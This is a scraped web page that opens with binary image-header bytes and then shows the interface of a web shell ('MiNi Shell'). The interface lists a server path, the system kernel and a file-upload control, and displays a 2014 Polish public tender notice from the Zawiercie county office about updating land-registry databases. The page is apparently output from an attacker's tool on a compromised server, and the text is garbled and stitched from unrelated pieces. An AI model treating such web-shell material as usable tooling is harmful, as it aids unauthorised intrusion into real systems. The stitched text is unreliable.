JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20141031/

Linux eb5096292c53 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20141031/362318-N-2014.html

<p class="kh_header"><b>Zawiercie: Wykonanie aktualizacji baz danych ewidencyjnych prowadzonych w Starostwie Powiatowym w Zawierciu o dane będące wynikiem wykonanych geodezyjnych prac scaleniowych - 2 zadania</b><br>
<b>Numer ogłoszenia: 362318 - 2014; data zamieszczenia: 31.10.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> nieobowiązkowe</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Starosta Zawierciański , ul. Sienkiewicza 34, 42-400 Zawiercie, woj. śląskie, tel. 32 67 107 10 do 12 wew. 551, faks 32 67 219 71.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zawiercie.powiat.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie aktualizacji baz danych ewidencyjnych prowadzonych w Starostwie Powiatowym w Zawierciu o dane będące wynikiem wykonanych geodezyjnych prac scaleniowych - 2 zadania.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Wykonanie aktualizacji baz danych ewidencyjnych prowadzonych w Starostwie Powiatowym w Zawierciu w części opisowej w programie GEOINFO VI -  INTEGRA oraz części graficznej w programie GEOINFO VI - MAPA - o dane będące wynikiem wykonanych geodezyjnych prac scaleniowych w niżej wymienionych obrębach.Ustalenie i uzupełnienie baz danych ewidencyjnych ( część opisowa i graficzna ) o granice rejonów statystycznych i ich oznaczenia.Par. 28 pkt.7 Rozporządzenia w sprawie ewidencji gruntów i budynków z dnia 29 marzec 2001r D.U. 38 poz 454 z późniejszymi zmianami. Zamawiający dopuszcza składanie ofert częściowych na poszczególne zadania: ZADANIE NR 1 Wykonanie aktualizacji baz danych ewidencyjnych prowadzonych w Starostwie Powiatowym w Zawierciu w części opisowej w programie GEOINFO VI -  INTEGRA oraz części graficznej w programie GEOINFO VI - MAPA - o dane będące wynikiem wykonanych geodezyjnych prac scaleniowych obejmujących obręby: Chruszczobród Piaski, Wiesiółka, Chruszczobród w gminie Łazy. Ustalenie i uzupełnienie baz danych ewidencyjnych ( część opisowa i graficzna ) o granice rejonów statystycznych i ich oznaczenia. Par. 28 pkt.7 Rozporządzenia w sprawie ewidencji gruntów i budynków z dnia 29 marzec 2001r D.U. 38 poz 454 z późniejszymi zmianami. Ogólna charakterystyka w/w obrębów scaleniowych: Dane ogólne - obręb Chruszczobród Piaski gmina Łazy: powierzchnia obrębu 						-	435 ha; ilość działek (przed scaleniem 1060)				-	po 615; ilość jednostek rejestrowych (przed scaleniem 202) 	- 	po 192; ilość budynków						-	201; ilość jednostek budynkowych				-	2; ilość jednostek lokalowych	-	0. Dane ogólne - obręb Wiesiółka gmina Łazy:powierzchnia obrębu 						-	181 ha; ilość działek (przed scaleniem 1141)				-	po 395; ilość jednostek rejestrowych (przed scaleniem 201) 	- 	po 188; ilość budynków						-	259. Dane ogólne - obręb Chruszczobród gmina Łazy:powierzchnia obrębu 						-	2268 ha; ilość działek ogółem (przed scaleniem 3702)		-	po 2730; ilość jednostek rejestrowych (przed scaleniem 1197) 	- 	po 1179; ilość budynków						-	1456; ilość jednostek budynkowych				-	7; ilość jednostek lokalowych					-	0. UWAGA - Obecnie scaleniem objęto tylko część obrębu Chruszczobród o pow. 439 ha. powierzchnia 	 	-	439 ha; ilość działek (przed scaleniem 1956)				-	po 984; ilość jednostek rejestrowych (przed scaleniem 618) 	- 	po 600.Dane ewidencyjne dla obrębów dotyczących Zadania nr 1 (po scaleniu gruntów) są obecnie wykonane przez wykonawcę scalenia - Częstochowskie Biuro Geodezji i Terenów Rolnych: część opisowa - w programie Microsoft Office, w formacie Akces lub Excel; część graficzna - w programie EW - Mapa 11, w formacie dxf lub swde. ZADANIE NR 2 Wykonanie aktualizacji baz danych ewidencyjnych prowadzonych w Starostwie Powiatowym w Zawierciu w części opisowej w programie GEOINFO VI -  INTEGRA oraz części graficznej w programie GEOINFO VI - MAPA - o dane będące wynikiem wykonanych geodezyjnych prac scaleniowych obejmujących obręby: Sławniów i Wierzbica w gminie Pilica. Ustalenie i uzupełnienie baz danych ewidencyjnych ( część opisowa i graficzna ) o granice rejonów statystycznych i ich oznaczenia. Par. 28 pkt.7 Rozporządzenia w sprawie ewidencji gruntów i budynków z dnia 29 marzec 2001r D.U. 38 poz 454 z późniejszymi zmianami. Ogólna charakterystyka w/w obrębów scaleniowych: Dane ogólne - obręb Sławniów gmina Pilica: powierzchnia obrębu 						-	715 ha; ilość działek (przed scaleniem 2169)				-	po 1220; ilość jednostek rejestrowych (przed scaleniem 566) 	- 	po 484; ilość budynków						-	758; ilość jednostek budynkowych				-	3; ilość jednostek lokalowych					-	45. Dane ogólne - obręb Wierzbica gmina Pilica: powierzchnia obrębu 						-	737 ha; ilość działek (przed scaleniem 1516)				-	po 793; ilość jednostek rejestrowych (przed scaleniem 227) 	- 	po 159; ilość budynków						-	394l; ilość jednostek budynkowych				-	1; ilość jednostek lokalowych					-	0. Dane ewidencyjne dla obrębów dotyczących Zadania nr 2 (po scaleniu gruntów) są obecnie wykonane przez wykonawcę scalenia - Krakowskie Biuro Geodezji i Terenów Rolnych: część opisowa - w programie Microsoft Office, w formacie Excel (pliki xls lub txt); część graficzna - w programie Bentley PowerMap z nakładką MK-SCAL, w formacie dgn, dxf lub swde. Zadaniem Wykonawcy będzie przetworzenie i dostosowanie w/w danych poscaleniowych do programu GEOINFO VI (INTEGRA oraz MAPA), a następnie zaimportowanie ich do komputerowych baz danych ewidencyjnych prowadzonych w Starostwie Powiatowym w Zawierciu - w siedzibie Zamawiającego. Do zaimportowania części kartograficznej (w postaci obiektowej) oprócz danych z pomiarów scalania gruntów można wykorzystać również dane z operatów dot. modernizacji ewidencji gruntów i budynków w/w wsi. Wykonawca zobowiązany jest do udzielenia 24 miesięcznego okresu gwarancji jakości                      i rękojmi za wady, licząc od dnia odbioru końcowego prac. Wykonawca w trakcie wykonywania umowy może powierzyć wykonanie części zamówienia podwykonawcom, na podstawie umowy o podwykonawstwo w rozumieniu art. 2 pkt 9b ustawy Pzp, mimo niewskazania w ofercie takiej części do powierzenia podwykonawcy. Jeżeli zmiana lub rezygnacja z podwykonawcy dotyczy podmiotu, na którego zasoby wykonawca powoływał się, na zasadach określonych w art. 26 ust. 2b, w celu wykazania spełniania warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1, wykonawca jest zobowiązany wykazać zamawiającemu, iż proponowany inny podwykonawca lub wykonawca samodzielnie spełnia  je w stopniu nie mniejszym niż wymagany w trakcie postępowania o udzielenie zamówienia.Zamawiający informuje, że ilekroć z niniejszej SIWZ użyte zostały znaki towarowe, patenty lub pochodzenie, nazwy własne - Zamawiający dopuszcza stosowanie rozwiązań równoważnych pod warunkiem, że zagwarantują one realizację  przedmiotu zamówienia  zgodnie z założeniami określonymi  w niniejszej SIWZ. Wykazanie równoważności  spoczywa na Wykonawcy..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 72.31.20.00-5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 17.12.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnianie Wykonawca zobowiązany jest wykazać w sposób szczególny. Wykonawca potwierdza spełnianie warunku poprzez złożenie oświadczenia o spełnianiu warunków udziału w postępowaniu - Załącznik nr 2 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>wykaz wykonanych (a w przypadku świadczeń okresowych lub ciągłych wykonywanych) głównych usług w zakresie niezbędnym  do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert a jeżeli okres prowadzenia  działalności jest krótszy, w tym okresie  z podaniem ich wartości, przedmiotu dat wykonania i odbiorców oraz załączeniem stosownych dowodów potwierdzających, że usługi te zostały wykonane należycie lub że są one wykonywane należycie. Wykaz należy sporządzić według wzoru stanowiącego załącznik nr 6 do SIWZ z uwzględnieniem spełnienia warunku szczegółowego tj. warunek ten zostanie uznany za spełniony, jeżeli Wykonawca wykaże wykonanie co najmniej jednego zamówienia tożsamego z przedmiotem zamówienia polegające na wykonaniu aktualizacji baz danych ewidencyjnych dla obrębu o powierzchni co najmniej 400ha wraz z dokumentem potwierdzającym, że usługa została wykonana należycie (wg wzoru stanowiącego załącznik Nr 6 do SIWZ). Ocena metodą graniczną - spełnia-nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnianie Wykonawca zobowiązany jest wykazać w sposób szczególny. Wykonawca potwierdza spełnianie warunku poprzez złożenie oświadczenia o spełnianiu warunków udziału w postępowaniu - Załącznik nr 2 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, wraz                            z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nich czynności oraz informacjami o podstawie do dysponowania tymi osobami (Załącznik nr 5), wraz z oświadczeniem, że osoby, które będą uczestniczyły w wykonywaniu zamówienia posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień (również w załączniku nr 5) z uwzględnieniem spełnienia warunku szczegółowego tj. warunek ten zostanie uznany za spełniony, jeżeli Wykonawca wykaże, że dysponuje lub będzie dysponował minimum jedną osobą, posiadającą uprawnienia zawodowe geodezyjne   w zakresie 2 oraz posiadającą umiejętność obsługi programów: GEOINFO - INTERGA oraz GEOINFO - MAPA, potwierdzone certyfikatem lub zaświadczeniem, a także posiadającą umiejętność obsługi programów Microsoft Office, EW-Mapa 11 i Bentley PowerMap z nakładką MK-SCAL / lub równoważnych umożliwiających profesjonalną realizację zamówienia. Ocena metodą graniczną - spełnia-nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnianie Wykonawca zobowiązany jest wykazać w sposób szczególny. Wykonawca potwierdza spełnianie warunku poprzez złożenie oświadczenia o spełnianiu warunków udziału w postępowaniu - Załącznik nr 2 do SIWZ.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Oferta powinna zawierać również:
1)	wypełniony formularz oferty (wg wzoru stanowiącego Załącznik Nr 1 do SIWZ )
2)	wykaz części zamówienia, które wykonawca zamierza powierzyć podwykonawcom, złożony na druku stanowiącym Załącznik Nr 4 do SIWZ (Wykonawca, który nie przewiduje udziału podwykonawców w realizacji zamówienia - nie składa tego dokumentu) 
3)	pełnomocnictwo do podpisania oferty, o ile prawo do podpisania oferty nie wynika             z innych dokumentów złożonych wraz z ofertą - treść pełnomocnictwa musi jednoznacznie wskazywać czynności, do wykonywania których pełnomocnik jest powołany,
4)	pełnomocnictwo do reprezentowania wszystkich wykonawców wspólnie ubiegających się o udzielenie zamówienia do reprezentowania wykonawców w postępowaniu lub do reprezentowania w postępowaniu i podpisania umowy</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zawiercie.powiat.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Starostwo Powiatowe w Zawierciu
Samodzielny Referat Zamówień Publicznych
ul. Sienkiewicza 34
42-400 Zawiercie
pok. 309 III piętro.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 12.11.2014 godzina 10:00, miejsce: Starostwo Powiatowe w Zawierciu
Samodzielny Referat Zamówień Publicznych
ul. Sienkiewicza 34
42-400 Zawiercie
pok. 309 III piętro.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Wykonanie aktualizacji baz danych ewidencyjnych prowadzonych w Starostwie Powiatowym w Zawierciu w części opisowej w programie GEOINFO VI -  INTEGRA oraz części graficznej w programie GEOINFO VI - MAPA - o dane będące wynikiem wykonanych geodezyjnych prac scaleniowych obejmujących obręby: Chruszczobród Piaski, Wiesiółka, Chruszczobród w gminie Łazy..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Wykonanie aktualizacji baz danych ewidencyjnych prowadzonych w Starostwie Powiatowym w Zawierciu w części opisowej w programie GEOINFO VI -  INTEGRA oraz części graficznej w programie GEOINFO VI - MAPA - o dane będące wynikiem wykonanych geodezyjnych prac scaleniowych obejmujących obręby: Chruszczobród Piaski, Wiesiółka, Chruszczobród w gminie Łazy. Ustalenie i uzupełnienie baz danych ewidencyjnych ( część opisowa i graficzna ) o granice rejonów statystycznych i ich oznaczenia. Par. 28 pkt.7 Rozporządzenia w sprawie ewidencji gruntów i budynków z dnia 29 marzec 2001r D.U. 38 poz 454 z późniejszymi zmianami. Ogólna charakterystyka w/w obrębów scaleniowych: Dane ogólne - obręb Chruszczobród Piaski gmina Łazy: powierzchnia obrębu 						-	435 ha; ilość działek (przed scaleniem 1060)				-	po 615; ilość jednostek rejestrowych (przed scaleniem 202) 	- 	po 192; ilość budynków						-	201; ilość jednostek budynkowych				-	2; ilość jednostek lokalowych	-	0. Dane ogólne - obręb Wiesiółka gmina Łazy:powierzchnia obrębu 						-	181 ha; ilość działek (przed scaleniem 1141)				-	po 395; ilość jednostek rejestrowych (przed scaleniem 201) 	- 	po 188; ilość budynków						-	259. Dane ogólne - obręb Chruszczobród gmina Łazy:powierzchnia obrębu 						-	2268 ha; ilość działek ogółem (przed scaleniem 3702)		-	po 2730; ilość jednostek rejestrowych (przed scaleniem 1197) 	- 	po 1179; ilość budynków						-	1456; ilość jednostek budynkowych				-	7; ilość jednostek lokalowych					-	0. UWAGA - Obecnie scaleniem objęto tylko część obrębu Chruszczobród o pow. 439 ha. powierzchnia 	 	-	439 ha; ilość działek (przed scaleniem 1956)				-	po 984; ilość jednostek rejestrowych (przed scaleniem 618) 	- 	po 600.Dane ewidencyjne dla obrębów dotyczących Zadania nr 1 (po scaleniu gruntów) są obecnie wykonane przez wykonawcę scalenia - Częstochowskie Biuro Geodezji i Terenów Rolnych: część opisowa - w programie Microsoft Office, w formacie Akces lub Excel; część graficzna - w programie EW - Mapa 11, w formacie dxf lub swde..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 72.31.20.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 17.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Wykonanie aktualizacji baz danych ewidencyjnych prowadzonych w Starostwie Powiatowym w Zawierciu w części opisowej w programie GEOINFO VI -  INTEGRA oraz części graficznej w programie GEOINFO VI - MAPA - o dane będące wynikiem wykonanych geodezyjnych prac scaleniowych obejmujących obręby: Sławniów i Wierzbica w gminie Pilica..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Wykonanie aktualizacji baz danych ewidencyjnych prowadzonych w Starostwie Powiatowym w Zawierciu w części opisowej w programie GEOINFO VI -  INTEGRA oraz części graficznej w programie GEOINFO VI - MAPA - o dane będące wynikiem wykonanych geodezyjnych prac scaleniowych obejmujących obręby: Sławniów i Wierzbica w gminie Pilica. Ustalenie i uzupełnienie baz danych ewidencyjnych ( część opisowa i graficzna ) o granice rejonów statystycznych i ich oznaczenia. Par. 28 pkt.7 Rozporządzenia w sprawie ewidencji gruntów i budynków z dnia 29 marzec 2001r D.U. 38 poz 454 z późniejszymi zmianami. Ogólna charakterystyka w/w obrębów scaleniowych: Dane ogólne - obręb Sławniów gmina Pilica: powierzchnia obrębu 						-	715 ha; ilość działek (przed scaleniem 2169)				-	po 1220; ilość jednostek rejestrowych (przed scaleniem 566) 	- 	po 484; ilość budynków						-	758; ilość jednostek budynkowych				-	3; ilość jednostek lokalowych					-	45. Dane ogólne - obręb Wierzbica gmina Pilica: powierzchnia obrębu 						-	737 ha; ilość działek (przed scaleniem 1516)				-	po 793; ilość jednostek rejestrowych (przed scaleniem 227) 	- 	po 159; ilość budynków						-	394l; ilość jednostek budynkowych				-	1; ilość jednostek lokalowych					-	0. Dane ewidencyjne dla obrębów dotyczących Zadania nr 2 (po scaleniu gruntów) są obecnie wykonane przez wykonawcę scalenia - Krakowskie Biuro Geodezji i Terenów Rolnych: część opisowa - w programie Microsoft Office, w formacie Excel (pliki xls lub txt); część graficzna - w programie Bentley PowerMap z nakładką MK-SCAL, w formacie dgn, dxf lub swde..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 72.31.20.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 17.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com